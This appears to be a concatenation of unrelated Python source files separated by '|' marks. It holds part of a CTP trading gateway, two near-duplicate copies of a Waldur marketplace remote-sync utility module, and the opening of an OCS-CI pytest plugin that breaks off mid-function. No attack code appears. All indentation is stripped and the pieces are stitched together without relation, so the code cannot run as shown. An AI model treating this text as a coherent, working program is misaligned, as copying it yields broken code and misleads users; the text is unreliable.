order = req.create_order_data(orderid, self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel existing order.
"""
frontid, sessionid, order_ref = req.orderid.split("_")
mini_req = {
"InstrumentID": req.symbol,
"ExchangeID": req.exchange.value,
"OrderRef": order_ref,
"FrontID": int(frontid),
"SessionID": int(sessionid),
"ActionFlag": THOST_FTDC_AF_Delete,
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqOrderAction(mini_req, self.reqid)
def query_account(self):
"""
Query account balance data.
"""
self.reqid += 1
self.reqQryTradingAccount({}, self.reqid)
def query_position(self):
"""
Query position holding data.
"""
if not symbol_exchange_map:
return
req = {
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqQryInvestorPosition(req, self.reqid)
def close(self):
""""""
if self.connect_status:
self.exit()
|
import io
import logging
from collections import defaultdict
import requests
import urllib3
from django.utils import dateparse
from django.utils.dateparse import parse_datetime
from rest_framework.exceptions import ValidationError
from waldur_client import WaldurClient, WaldurClientException
from waldur_core.core.utils import get_system_robot
from waldur_core.structure import models as structure_models
from waldur_mastermind.marketplace import models as marketplace_models
from waldur_mastermind.marketplace_remote.constants import (
OFFERING_COMPONENT_FIELDS,
PLAN_FIELDS,
)
from . import PLUGIN_NAME
logger = logging.getLogger(__name__)
INVALID_RESOURCE_STATES = (
marketplace_models.Resource.States.CREATING,
marketplace_models.Resource.States.TERMINATED,
)
def get_client_for_offering(offering):
options = offering.secret_options
api_url = options['api_url']
token = options['token']
return WaldurClient(api_url, token)
def get_project_backend_id(project):
return f'{project.customer.uuid}_{project.uuid}'
def pull_fields(fields, local_object, remote_object):
changed_fields = set()
for field in fields:
if remote_object[field] != getattr(local_object, field):
setattr(local_object, field, remote_object[field])
changed_fields.add(field)
if changed_fields:
local_object.save(update_fields=changed_fields)
return changed_fields
def get_remote_offerings_for_project(project):
offering_ids = (
marketplace_models.Resource.objects.filter(
project=project,
offering__type=PLUGIN_NAME,
offering__state=marketplace_models.Offering.States.ACTIVE,
)
.exclude(state__in=INVALID_RESOURCE_STATES)
.values_list('offering', flat=True)
.distinct()
)
return marketplace_models.Offering.objects.filter(pk__in=offering_ids)
def get_projects_with_remote_offerings():
projects_with_offerings = defaultdict(set)
resource_pairs = (
marketplace_models.Resource.objects.filter(offering__type=PLUGIN_NAME)
.exclude(state__in=INVALID_RESOURCE_STATES)
.values('offering', 'project')
.distinct()
)
for pair in resource_pairs:
try:
project = structure_models.Project.available_objects.get(pk=pair['project'])
except structure_models.Project.DoesNotExist:
logger.debug(
f'Skipping resource from a removed project with PK {pair['project']}'
)
continue
offering = marketplace_models.Offering.objects.get(pk=pair['offering'])
projects_with_offerings[project].add(offering)
order_item_pairs = (
marketplace_models.OrderItem.objects.filter(
offering__type=PLUGIN_NAME,
state__in=(
marketplace_models.OrderItem.States.PENDING,
marketplace_models.OrderItem.States.EXECUTING,
),
)
.values('offering', 'order__project')
.distinct()
)
for pair in order_item_pairs:
try:
project = structure_models.Project.available_objects.get(
pk=pair['order__project']
)
except structure_models.Project.DoesNotExist:
logger.debug(
f'Skipping order item from a removed project with PK {pair['order__project']}'
)
continue
offering = marketplace_models.Offering.objects.get(pk=pair['offering'])
projects_with_offerings[project].add(offering)
return projects_with_offerings
def get_remote_project(offering, project, client=None):
if not client:
client = get_client_for_offering(offering)
remote_project_uuid = get_project_backend_id(project)
remote_projects = client.list_projects({'backend_id': remote_project_uuid})
if len(remote_projects) == 0:
return None
elif len(remote_projects) == 1:
return remote_projects[0]
else:
raise ValidationError('There are multiple projects in remote Waldur.')
def create_remote_project(offering, project, client=None):
if not client:
client = get_client_for_offering(offering)
options = offering.secret_options
remote_customer_uuid = options['customer_uuid']
remote_project_name = f'{project.customer.name} / {project.name}'
remote_project_uuid = get_project_backend_id(project)
return client.create_project(
customer_uuid=remote_customer_uuid,
name=remote_project_name,
backend_id=remote_project_uuid,
description=project.description,
end_date=project.end_date and project.end_date.isoformat(),
oecd_fos_2007_code=project.oecd_fos_2007_code,
is_industry=project.is_industry,
type_uuid=project.type and project.type.uuid.hex,
)
def get_or_create_remote_project(offering, project, client=None):
remote_project = get_remote_project(offering, project, client)
if not remote_project:
remote_project = create_remote_project(offering, project, client)
return remote_project, True
else:
return remote_project, False
def update_remote_project(request):
client = get_client_for_offering(request.offering)
remote_project_name = f'{request.project.customer.name} / {request.new_name}'
remote_project_uuid = get_project_backend_id(request.project)
remote_projects = client.list_projects({'backend_id': remote_project_uuid})
if len(remote_projects) == 1:
remote_project = remote_projects[0]
payload = dict(
name=remote_project_name,
description=request.new_description,
end_date=request.new_end_date and request.new_end_date.isoformat(),
oecd_fos_2007_code=request.new_oecd_fos_2007_code,
is_industry=request.new_is_industry,
)
if any(remote_project.get(key) != value for key, value in payload.items()):
client.update_project(project_uuid=remote_project['uuid'], **payload)
def create_or_update_project_permission(
client, remote_project_uuid, remote_user_uuid, role, expiration_time
):
permissions = client.get_project_permissions(
remote_project_uuid, remote_user_uuid, role
)
if not permissions:
return client.create_project_permission(
remote_user_uuid,
remote_project_uuid,
role,
expiration_time.isoformat() if expiration_time else expiration_time,
)
permission = permissions[0]
old_expiration_time = (
dateparse.parse_datetime(permission['expiration_time'])
if permission['expiration_time']
else permission['expiration_time']
)
if old_expiration_time != expiration_time:
return client.update_project_permission(
permission['pk'],
expiration_time.isoformat() if expiration_time else expiration_time,
)
def remove_project_permission(client, remote_project_uuid, remote_user_uuid, role):
remote_permissions = client.get_project_permissions(
remote_project_uuid, remote_user_uuid, role
)
if remote_permissions:
client.remove_project_permission(remote_permissions[0]['pk'])
return True
return False
def sync_project_permission(grant, project, role, user, expiration_time):
for offering in get_remote_offerings_for_project(project):
client = get_client_for_offering(offering)
try:
remote_user_uuid = client.get_remote_eduteams_user(user.username)['uuid']
except WaldurClientException as e:
logger.debug(
f'Unable to fetch remote user {user.username} in offering {offering}: {e}'
)
continue
try:
remote_project, _ = get_or_create_remote_project(offering, project, client)
remote_project_uuid = remote_project['uuid']
except WaldurClientException as e:
logger.debug(
f'Unable to create remote project {project} in offering {offering}: {e}'
)
continue
if grant:
try:
create_or_update_project_permission(
client,
remote_project_uuid,
remote_user_uuid,
role,
expiration_time,
)
except WaldurClientException as e:
logger.debug(
f'Unable to create permission for user [{remote_user_uuid}] with role {role} (until {expiration_time}) '
f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
)
else:
try:
remove_project_permission(
client, remote_project_uuid, remote_user_uuid, role
)
except WaldurClientException as e:
logger.debug(
f'Unable to remove permission for user [{remote_user_uuid}] with role {role} '
f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
)
def push_project_users(offering, project, remote_project_uuid):
client = get_client_for_offering(offering)
permissions = collect_local_permissions(offering, project)
for username, (role, expiration_time) in permissions.items():
try:
remote_user_uuid = client.get_remote_eduteams_user(username)['uuid']
except WaldurClientException as e:
logger.debug(
f'Unable to fetch remote user {username} in offering {offering}: {e}'
)
continue
try:
create_or_update_project_permission(
client, remote_project_uuid, remote_user_uuid, role, expiration_time
)
except WaldurClientException as e:
logger.debug(
f'Unable to create permission for user [{remote_user_uuid}] with role {role} '
f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
)
def collect_local_permissions(offering, project):
permissions = defaultdict()
for permission in structure_models.ProjectPermission.objects.filter(
project=project, is_active=True, user__registration_method='eduteams'
):
permissions[permission.user.username] = (
permission.role,
permission.expiration_time,
)
# Skip mapping for owners if offering belongs to the same customer
if offering.customer == project.customer:
return permissions
for permission in structure_models.CustomerPermission.objects.filter(
customer=project.customer,
is_active=True,
role=structure_models.CustomerRole.OWNER,
user__registration_method='eduteams',
):
# Organization owner is mapped to project manager in remote Waldur
permissions[permission.user.username] = (
structure_models.ProjectRole.MANAGER,
permission.expiration_time,
)
return permissions
def parse_resource_state(serialized_state):
return {v: k for (k, v) in marketplace_models.Resource.States.CHOICES}[
serialized_state
]
def parse_order_state(serialized_state):
return {v: k for (k, v) in marketplace_models.Order.States.CHOICES}[
serialized_state
]
def parse_order_item_state(serialized_state):
return {v: k for (k, v) in marketplace_models.OrderItem.States.CHOICES}[
serialized_state
]
def parse_order_item_type(serialized_state):
return {v: k for (k, v) in marketplace_models.OrderItem.Types.CHOICES}[
serialized_state
]
def import_order(remote_order, project):
return marketplace_models.Order.objects.create(
project=project,
state=parse_order_state(remote_order['state']),
created_by=get_system_robot(),
created=parse_datetime(remote_order['created']),
approved_by=get_system_robot(),
approved_at='approved_at' in remote_order
and parse_datetime(remote_order['approved_at'])
or None,
)
def import_order_item(remote_order_item, local_order, resource, remote_order_uuid):
return marketplace_models.OrderItem.objects.create(
order=local_order,
resource=resource,
type=parse_order_item_type(remote_order_item['type']),
offering=resource.offering,
# NB: As a backend_id of local OrderItem, uuid of a remote Order is used
backend_id=remote_order_uuid,
attributes=remote_order_item.get('attributes', {}),
error_message=remote_order_item.get('error_message', ''),
error_traceback=remote_order_item.get('error_traceback', ''),
state=parse_order_item_state(remote_order_item['state']),
created=parse_datetime(remote_order_item['created']),
reviewed_by=get_system_robot(),
)
def get_new_order_ids(client, backend_id):
remote_order_items = client.list_order_items(
{'resource_uuid': backend_id, 'field': ['order_uuid']}
)
local_order_ids = set(
marketplace_models.OrderItem.objects.filter(
resource__backend_id=backend_id
).values_list('backend_id', flat=True)
)
remote_order_ids = {order_item['order_uuid'] for order_item in remote_order_items}
return remote_order_ids - local_order_ids
def import_resource_order_items(resource):
if not resource.backend_id:
return []
client = get_client_for_offering(resource.offering)
new_order_ids = get_new_order_ids(client, resource.backend_id)
imported_order_items = []
for order_id in new_order_ids:
remote_order = client.get_order(order_id)
local_order = import_order(remote_order, resource.project)
for remote_order_item in remote_order['items']:
local_order_item = import_order_item(
remote_order_item, local_order, resource, order_id
)
imported_order_items.append(local_order_item)
return imported_order_items
def pull_resource_state(local_resource):
if not local_resource.backend_id:
return
client = get_client_for_offering(local_resource.offering)
remote_resource = client.get_marketplace_resource(local_resource.backend_id)
remote_state = parse_resource_state(remote_resource['state'])
if local_resource.state != remote_state:
local_resource.state = remote_state
local_resource.save(update_fields=['state'])
def import_offering_components(local_offering, remote_offering):
local_components_map = {}
for remote_component in remote_offering['components']:
local_component = marketplace_models.OfferingComponent.objects.create(
offering=local_offering,
**{key: remote_component[key] for key in OFFERING_COMPONENT_FIELDS},
)
local_components_map[local_component.type] = local_component
logger.info(
'Component %s (type: %s) for offering %s has been created',
local_component,
local_component.type,
local_offering,
)
return local_components_map
def import_plans(local_offering, remote_offering, local_components_map):
for remote_plan in remote_offering['plans']:
local_plan = marketplace_models.Plan.objects.create(
offering=local_offering,
backend_id=remote_plan['uuid'],
**{key: remote_plan[key] for key in PLAN_FIELDS},
)
remote_prices = remote_plan['prices']
remote_quotas = remote_plan['quotas']
components = set(remote_prices.keys()) | set(remote_quotas.keys())
for component_type in components:
plan_component = marketplace_models.PlanComponent.objects.create(
plan=local_plan,
component=local_components_map[component_type],
price=remote_prices[component_type],
amount=remote_quotas[component_type],
)
logger.info(
'Plan component %s in offering %s has been created',
plan_component,
local_offering,
)
def import_offering_thumbnail(local_offering, remote_offering):
thumbnail_url = remote_offering['thumbnail']
if thumbnail_url:
thumbnail_resp = requests.get(thumbnail_url)
content = io.BytesIO(thumbnail_resp.content)
file_name = urllib3.util.parse_url(thumbnail_url).path.split('/')[-1]
local_offering.thumbnail.save(file_name, content)
else:
local_offering.thumbnail.delete()
local_offering.save(update_fields=['thumbnail'])
| import io
import logging
from collections import defaultdict
import requests
import urllib3
from django.utils import dateparse
from django.utils.dateparse import parse_datetime
from rest_framework.exceptions import ValidationError
from waldur_client import WaldurClient, WaldurClientException
from waldur_core.core.utils import get_system_robot
from waldur_core.structure import models as structure_models
from waldur_mastermind.marketplace import models as marketplace_models
from waldur_mastermind.marketplace_remote.constants import (
OFFERING_COMPONENT_FIELDS,
PLAN_FIELDS,
)
from . import PLUGIN_NAME
logger = logging.getLogger(__name__)
INVALID_RESOURCE_STATES = (
marketplace_models.Resource.States.CREATING,
marketplace_models.Resource.States.TERMINATED,
)
def get_client_for_offering(offering):
options = offering.secret_options
api_url = options['api_url']
token = options['token']
return WaldurClient(api_url, token)
def get_project_backend_id(project):
return f'{project.customer.uuid}_{project.uuid}'
def pull_fields(fields, local_object, remote_object):
changed_fields = set()
for field in fields:
if remote_object[field] != getattr(local_object, field):
setattr(local_object, field, remote_object[field])
changed_fields.add(field)
if changed_fields:
local_object.save(update_fields=changed_fields)
return changed_fields
def get_remote_offerings_for_project(project):
offering_ids = (
marketplace_models.Resource.objects.filter(
project=project,
offering__type=PLUGIN_NAME,
offering__state=marketplace_models.Offering.States.ACTIVE,
)
.exclude(state__in=INVALID_RESOURCE_STATES)
.values_list('offering', flat=True)
.distinct()
)
return marketplace_models.Offering.objects.filter(pk__in=offering_ids)
def get_projects_with_remote_offerings():
projects_with_offerings = defaultdict(set)
resource_pairs = (
marketplace_models.Resource.objects.filter(offering__type=PLUGIN_NAME)
.exclude(state__in=INVALID_RESOURCE_STATES)
.values('offering', 'project')
.distinct()
)
for pair in resource_pairs:
try:
project = structure_models.Project.available_objects.get(pk=pair['project'])
except structure_models.Project.DoesNotExist:
logger.debug(
f'Skipping resource from a removed project with PK {pair["project"]}'
)
continue
offering = marketplace_models.Offering.objects.get(pk=pair['offering'])
projects_with_offerings[project].add(offering)
order_item_pairs = (
marketplace_models.OrderItem.objects.filter(
offering__type=PLUGIN_NAME,
state__in=(
marketplace_models.OrderItem.States.PENDING,
marketplace_models.OrderItem.States.EXECUTING,
),
)
.values('offering', 'order__project')
.distinct()
)
for pair in order_item_pairs:
try:
project = structure_models.Project.available_objects.get(
pk=pair['order__project']
)
except structure_models.Project.DoesNotExist:
logger.debug(
f'Skipping order item from a removed project with PK {pair["order__project"]}'
)
continue
offering = marketplace_models.Offering.objects.get(pk=pair['offering'])
projects_with_offerings[project].add(offering)
return projects_with_offerings
def get_remote_project(offering, project, client=None):
if not client:
client = get_client_for_offering(offering)
remote_project_uuid = get_project_backend_id(project)
remote_projects = client.list_projects({'backend_id': remote_project_uuid})
if len(remote_projects) == 0:
return None
elif len(remote_projects) == 1:
return remote_projects[0]
else:
raise ValidationError('There are multiple projects in remote Waldur.')
def create_remote_project(offering, project, client=None):
if not client:
client = get_client_for_offering(offering)
options = offering.secret_options
remote_customer_uuid = options['customer_uuid']
remote_project_name = f'{project.customer.name} / {project.name}'
remote_project_uuid = get_project_backend_id(project)
return client.create_project(
customer_uuid=remote_customer_uuid,
name=remote_project_name,
backend_id=remote_project_uuid,
description=project.description,
end_date=project.end_date and project.end_date.isoformat(),
oecd_fos_2007_code=project.oecd_fos_2007_code,
is_industry=project.is_industry,
type_uuid=project.type and project.type.uuid.hex,
)
def get_or_create_remote_project(offering, project, client=None):
remote_project = get_remote_project(offering, project, client)
if not remote_project:
remote_project = create_remote_project(offering, project, client)
return remote_project, True
else:
return remote_project, False
def update_remote_project(request):
client = get_client_for_offering(request.offering)
remote_project_name = f'{request.project.customer.name} / {request.new_name}'
remote_project_uuid = get_project_backend_id(request.project)
remote_projects = client.list_projects({'backend_id': remote_project_uuid})
if len(remote_projects) == 1:
remote_project = remote_projects[0]
payload = dict(
name=remote_project_name,
description=request.new_description,
end_date=request.new_end_date and request.new_end_date.isoformat(),
oecd_fos_2007_code=request.new_oecd_fos_2007_code,
is_industry=request.new_is_industry,
)
if any(remote_project.get(key) != value for key, value in payload.items()):
client.update_project(project_uuid=remote_project['uuid'], **payload)
def create_or_update_project_permission(
client, remote_project_uuid, remote_user_uuid, role, expiration_time
):
permissions = client.get_project_permissions(
remote_project_uuid, remote_user_uuid, role
)
if not permissions:
return client.create_project_permission(
remote_user_uuid,
remote_project_uuid,
role,
expiration_time.isoformat() if expiration_time else expiration_time,
)
permission = permissions[0]
old_expiration_time = (
dateparse.parse_datetime(permission['expiration_time'])
if permission['expiration_time']
else permission['expiration_time']
)
if old_expiration_time != expiration_time:
return client.update_project_permission(
permission['pk'],
expiration_time.isoformat() if expiration_time else expiration_time,
)
def remove_project_permission(client, remote_project_uuid, remote_user_uuid, role):
remote_permissions = client.get_project_permissions(
remote_project_uuid, remote_user_uuid, role
)
if remote_permissions:
client.remove_project_permission(remote_permissions[0]['pk'])
return True
return False
def sync_project_permission(grant, project, role, user, expiration_time):
for offering in get_remote_offerings_for_project(project):
client = get_client_for_offering(offering)
try:
remote_user_uuid = client.get_remote_eduteams_user(user.username)['uuid']
except WaldurClientException as e:
logger.debug(
f'Unable to fetch remote user {user.username} in offering {offering}: {e}'
)
continue
try:
remote_project, _ = get_or_create_remote_project(offering, project, client)
remote_project_uuid = remote_project['uuid']
except WaldurClientException as e:
logger.debug(
f'Unable to create remote project {project} in offering {offering}: {e}'
)
continue
if grant:
try:
create_or_update_project_permission(
client,
remote_project_uuid,
remote_user_uuid,
role,
expiration_time,
)
except WaldurClientException as e:
logger.debug(
f'Unable to create permission for user [{remote_user_uuid}] with role {role} (until {expiration_time}) '
f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
)
else:
try:
remove_project_permission(
client, remote_project_uuid, remote_user_uuid, role
)
except WaldurClientException as e:
logger.debug(
f'Unable to remove permission for user [{remote_user_uuid}] with role {role} '
f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
)
def push_project_users(offering, project, remote_project_uuid):
client = get_client_for_offering(offering)
permissions = collect_local_permissions(offering, project)
for username, (role, expiration_time) in permissions.items():
try:
remote_user_uuid = client.get_remote_eduteams_user(username)['uuid']
except WaldurClientException as e:
logger.debug(
f'Unable to fetch remote user {username} in offering {offering}: {e}'
)
continue
try:
create_or_update_project_permission(
client, remote_project_uuid, remote_user_uuid, role, expiration_time
)
except WaldurClientException as e:
logger.debug(
f'Unable to create permission for user [{remote_user_uuid}] with role {role} '
f'and project [{remote_project_uuid}] in offering [{offering}]: {e}'
)
def collect_local_permissions(offering, project):
permissions = defaultdict()
for permission in structure_models.ProjectPermission.objects.filter(
project=project, is_active=True, user__registration_method='eduteams'
):
permissions[permission.user.username] = (
permission.role,
permission.expiration_time,
)
# Skip mapping for owners if offering belongs to the same customer
if offering.customer == project.customer:
return permissions
for permission in structure_models.CustomerPermission.objects.filter(
customer=project.customer,
is_active=True,
role=structure_models.CustomerRole.OWNER,
user__registration_method='eduteams',
):
# Organization owner is mapped to project manager in remote Waldur
permissions[permission.user.username] = (
structure_models.ProjectRole.MANAGER,
permission.expiration_time,
)
return permissions
def parse_resource_state(serialized_state):
return {v: k for (k, v) in marketplace_models.Resource.States.CHOICES}[
serialized_state
]
def parse_order_state(serialized_state):
return {v: k for (k, v) in marketplace_models.Order.States.CHOICES}[
serialized_state
]
def parse_order_item_state(serialized_state):
return {v: k for (k, v) in marketplace_models.OrderItem.States.CHOICES}[
serialized_state
]
def parse_order_item_type(serialized_state):
return {v: k for (k, v) in marketplace_models.OrderItem.Types.CHOICES}[
serialized_state
]
def import_order(remote_order, project):
return marketplace_models.Order.objects.create(
project=project,
state=parse_order_state(remote_order['state']),
created_by=get_system_robot(),
created=parse_datetime(remote_order['created']),
approved_by=get_system_robot(),
approved_at='approved_at' in remote_order
and parse_datetime(remote_order['approved_at'])
or None,
)
def import_order_item(remote_order_item, local_order, resource, remote_order_uuid):
return marketplace_models.OrderItem.objects.create(
order=local_order,
resource=resource,
type=parse_order_item_type(remote_order_item['type']),
offering=resource.offering,
# NB: As a backend_id of local OrderItem, uuid of a remote Order is used
backend_id=remote_order_uuid,
attributes=remote_order_item.get('attributes', {}),
error_message=remote_order_item.get('error_message', ''),
error_traceback=remote_order_item.get('error_traceback', ''),
state=parse_order_item_state(remote_order_item['state']),
created=parse_datetime(remote_order_item['created']),
reviewed_by=get_system_robot(),
)
def get_new_order_ids(client, backend_id):
remote_order_items = client.list_order_items(
{'resource_uuid': backend_id, 'field': ['order_uuid']}
)
local_order_ids = set(
marketplace_models.OrderItem.objects.filter(
resource__backend_id=backend_id
).values_list('backend_id', flat=True)
)
remote_order_ids = {order_item['order_uuid'] for order_item in remote_order_items}
return remote_order_ids - local_order_ids
def import_resource_order_items(resource):
if not resource.backend_id:
return []
client = get_client_for_offering(resource.offering)
new_order_ids = get_new_order_ids(client, resource.backend_id)
imported_order_items = []
for order_id in new_order_ids:
remote_order = client.get_order(order_id)
local_order = import_order(remote_order, resource.project)
for remote_order_item in remote_order['items']:
local_order_item = import_order_item(
remote_order_item, local_order, resource, order_id
)
imported_order_items.append(local_order_item)
return imported_order_items
def pull_resource_state(local_resource):
if not local_resource.backend_id:
return
client = get_client_for_offering(local_resource.offering)
remote_resource = client.get_marketplace_resource(local_resource.backend_id)
remote_state = parse_resource_state(remote_resource['state'])
if local_resource.state != remote_state:
local_resource.state = remote_state
local_resource.save(update_fields=['state'])
def import_offering_components(local_offering, remote_offering):
local_components_map = {}
for remote_component in remote_offering['components']:
local_component = marketplace_models.OfferingComponent.objects.create(
offering=local_offering,
**{key: remote_component[key] for key in OFFERING_COMPONENT_FIELDS},
)
local_components_map[local_component.type] = local_component
logger.info(
'Component %s (type: %s) for offering %s has been created',
local_component,
local_component.type,
local_offering,
)
return local_components_map
def import_plans(local_offering, remote_offering, local_components_map):
for remote_plan in remote_offering['plans']:
local_plan = marketplace_models.Plan.objects.create(
offering=local_offering,
backend_id=remote_plan['uuid'],
**{key: remote_plan[key] for key in PLAN_FIELDS},
)
remote_prices = remote_plan['prices']
remote_quotas = remote_plan['quotas']
components = set(remote_prices.keys()) | set(remote_quotas.keys())
for component_type in components:
plan_component = marketplace_models.PlanComponent.objects.create(
plan=local_plan,
component=local_components_map[component_type],
price=remote_prices[component_type],
amount=remote_quotas[component_type],
)
logger.info(
'Plan component %s in offering %s has been created',
plan_component,
local_offering,
)
def import_offering_thumbnail(local_offering, remote_offering):
thumbnail_url = remote_offering['thumbnail']
if thumbnail_url:
thumbnail_resp = requests.get(thumbnail_url)
content = io.BytesIO(thumbnail_resp.content)
file_name = urllib3.util.parse_url(thumbnail_url).path.split('/')[-1]
local_offering.thumbnail.save(file_name, content)
else:
local_offering.thumbnail.delete()
local_offering.save(update_fields=['thumbnail'])
|
"""
This is plugin for all the plugins/hooks related to OCS-CI and its
configuration.
The basic configuration is done in run_ocsci.py module casue we need to load
all the config before pytest run. This run_ocsci.py is just a wrapper for
pytest which proccess config and passes all params to pytest.
"""
import logging
import os
import pytest
from junitparser import JUnitXml
from ocs_ci.framework import config as ocsci_config
from ocs_ci.framework.exceptions import (
ClusterNameLengthError,
ClusterNameNotProvidedError,
ClusterPathNotProvidedError,
)
from ocs_ci.ocs.constants import (
CLUSTER_NAME_MAX_CHARACTERS,
CLUSTER_NAME_MIN_CHARACTERS,
LOG_FORMAT,
OCP_VERSION_CONF_DIR,
)
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceNotFoundError,
)
from ocs_ci.ocs.resources.ocs import get_version_info
from ocs_ci.ocs.utils import collect_ocs_logs, collect_prometheus_metrics
from ocs_ci.utility.utils import (
dump_config_to_file,
get_ceph_version,
get_cluster_name,
get_cluster_version,
get_csi_versions,
get_ocs_build_number,
get_testrun_name,
load_config_file,
)
from ocs_ci.utility.reporting import update_live_must_gather_image
__all__ = [
"pytest_addoption",
]
log = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(LOG_FORMAT))
log.addHandler(handler)
def _pytest_addoption_cluster_specific(parser):
"""
Handle multicluster options here
We will add options which will have suffix number same as its cluster number
i.e `--cluster1 --cluster-name xyz --cluster-path /a/b/c --ocsci-conf /path/to/c1
--ocsci-conf /path/to/c2...` will get translated to `--cluster1 --cluster-name1 xyz
--cluster-path1 /a/b/c --ocsci-conf1 /path/to/c1 --ocsci-conf1 /path/to/c2`
Rest of the general run-ci options will be handled by pytest_addoption
"""
add_common_ocsci_conf = False
for i in range(ocsci_config.nclusters):
# If it's not multicluster then no suffix will be added
suffix = i + 1 if ocsci_config.multicluster else ""
if not add_common_ocsci_conf and ocsci_config.multicluster:
parser.addoption(
"--ocsci-conf",
dest="ocsci_conf",
action="append",
help="Path to config file of OCS CI",
)
add_common_ocsci_conf = True
parser.addoption(
f"--ocsci-conf{suffix}",
dest=f"ocsci_conf{suffix}",
action="append",
help="Path to config file of OCS CI",
)
parser.addoption(
f"--cluster-path{suffix}",
dest=f"cluster_path{suffix}",
help="Path to cluster directory",
)
parser.addoption(
f"--cluster-name{suffix}",
dest=f"cluster_name{suffix}",
help="Name of cluster",
)
parser.addoption(
f"--ocs-version{suffix}",
dest=f"ocs_version{suffix}",
help="ocs version for which ocs-ci to be run",
)
parser.addoption(
f"--ocp-version{suffix}",
dest=f"ocp_version{suffix}",
help="""
OCP version to be used for deployment. This version will be used for
load file from conf/ocp_version/ocp-VERSION-config.yaml. You can use
for example those values:
4.2: for nightly 4.2 OCP build
4.2-ga: for latest GAed 4.2 OCP build
4.2-ga-minus1: for latest GAed 4.2 build - 1
""",
)
parser.addoption(
f"--ocs-registry-image{suffix}",
dest=f"ocs_registry_image{suffix}",
help=(
"ocs registry image to be used for deployment "
"(e.g. quay.io/rhceph-dev/ocs-olm-operator:latest-4.2)"
),
)
parser.addoption(
f"--osd-size{suffix}",
dest=f"osd_size{suffix}",
type=int,
help="OSD size in GB - for 2TB pass 2048, for 0.5TB pass 512 and so on.",
)
def pytest_addoption(parser):
"""
Add necessary options to initialize OCS CI library.
"""
# Handle only cluster specific options from the below call
# Rest of the options which are general, will be handled here itself
_pytest_addoption_cluster_specific(parser)
parser.addoption(
"--teardown",
dest="teardown",
action="store_true",
default=False,
help="If provided the test cluster will be destroyed after tests complete",
)
parser.addoption(
"--deploy",
dest="deploy",
action="store_true",
default=False,
help="If provided a test cluster will be deployed on AWS to use for testing",
)
parser.addoption(
"--live-deploy",
dest="live_deploy",
action="store_true",
default=False,
help="Deploy OCS from live registry like a customer",
)
parser.addoption(
"--email",
dest="email",
help="Email ID to send results",
)
parser.addoption(
"--squad-analysis",
dest="squad_analysis",
action="store_true",
default=False,
help="Include Squad Analysis to email report.",
)
parser.addoption(
"--collect-logs",
dest="collect-logs",
action="store_true",
default=False,
help="Collect OCS logs when test case failed",
)
parser.addoption(
"--collect-logs-on-success-run",
dest="collect_logs_on_success_run",
action="store_true",
default=False,
help="Collect must gather logs at the end of the execution (also when no failure in the tests)",
)
parser.addoption(
"--io-in-bg",
dest="io_in_bg",
action="store_true",
default=False,
help="Run IO in the background",
)
parser.addoption(
"--io-load",
dest="io_load",
help="IOs throughput target percentage. Value should be between 0 to 100",
)
parser.addoption(
"--log-cluster-utilization",
dest="log_cluster_utilization",
action="store_true",
help="Enable logging of cluster utilization metrics every 10 seconds",
)
parser.addoption(
"--upgrade-ocs-version",
dest="upgrade_ocs_version",
help="ocs version to upgrade (e.g. 4.3)",
)
parser.addoption(
"--upgrade-ocp-version",
dest="upgrade_ocp_version",
help="""
OCP version to upgrade to. This version will be used to
load file from conf/ocp_version/ocp-VERSION-config.yaml.
For example:
4.5 (for nightly 4.5 OCP build)
4.5-ga (for latest GAed 4.5 OCP build)
""",
)
parser.addoption(
"--upgrade-ocp-image",
dest="upgrade_ocp_image",
help="""
OCP image to upgrade to. This image string will be split on ':' to
determine the image source and the specified tag to use.
(e.g. quay.io/openshift-release-dev/ocp-release:4.6.0-x86_64)
""",
)
parser.addoption(
"--ocp-installer-version",
dest="ocp_installer_version",
help="""
Specific OCP installer version to be used for deployment. This option
will generally be used for non-GA or nightly builds. (e.g. 4.5.5).
This option will overwrite any values set via --ocp-version.
""",
)
parser.addoption(
"--upgrade-ocs-registry-image",
dest="upgrade_ocs_registry_image",
help=(
"ocs registry image to be used for upgrade "
"(e.g. quay.io/rhceph-dev/ocs-olm-operator:latest-4.3)"
),
)
parser.addoption(
"--flexy-env-file", dest="flexy_env_file", help="Path to flexy environment file"
)
parser.addoption(
"--csv-change",
dest="csv_change",
help=(
"Pattern or string to change in the CSV. Should contain the value to replace "
"from and the value to replace to, separated by '::'"
),
)
parser.addoption(
"--dev-mode",
dest="dev_mode",
action="store_true",
default=False,
help=(
"Runs in development mode. It skips few checks like collecting "
"versions, collecting logs, etc"
),
)
parser.addoption(
"--ceph-debug",
dest="ceph_debug",
action="store_true",
default=False,
help=(
"For OCS cluster deployment with Ceph configured in debug mode. Available for OCS 4.7 and above"
),
)
parser.addoption(
"--skip-download-client",
dest="skip_download_client",
action="store_true",
default=False,
help="Skip the openshift client download step or not",
)
parser.addoption(
"--disable-components",
dest="disable_components",
action="append",
choices=["rgw", "cephfs", "noobaa", "blockpools"],
help=("disable deployment of ocs component:rgw, cephfs, noobaa, blockpools."),
)
parser.addoption(
"--re-trigger-failed-tests",
dest="re_trigger_failed_tests",
help="""
Path to the xunit file for xml junit report from the previous execution.
If the file is provided, the execution will remove all the test cases
which passed and will run only those test cases which were skipped /
failed / or had error in the provided report.
""",
)
parser.addoption(
"--default-cluster-context-index",
dest="default_cluster_context_index",
default=0,
help="""
Sets the default index of the cluster whose context needs to be
loaded when run-ci starts
""",
)
def pytest_configure(config):
"""
Load config files, and initialize ocs-ci library.
Args:
config (pytest.config): Pytest config object
"""
set_log_level(config)
# Somewhat hacky but this lets us differentiate between run-ci executions
# and plain pytest unit test executions
ocscilib_module = "ocs_ci.framework.pytest_customization.ocscilib"
if ocscilib_module not in config.getoption("-p"):
return
for i in range(ocsci_config.nclusters):
log.info(f"Pytest configure switching to: cluster={i}")
ocsci_config.switch_ctx(i)
if not (config.getoption("--help") or config.getoption("collectonly")):
process_cluster_cli_params(config)
config_file = os.path.expanduser(
os.path.join(
ocsci_config.RUN["log_dir"],
f"run-{ocsci_config.RUN["run_id"]}-cl{i}-config.yaml",
)
)
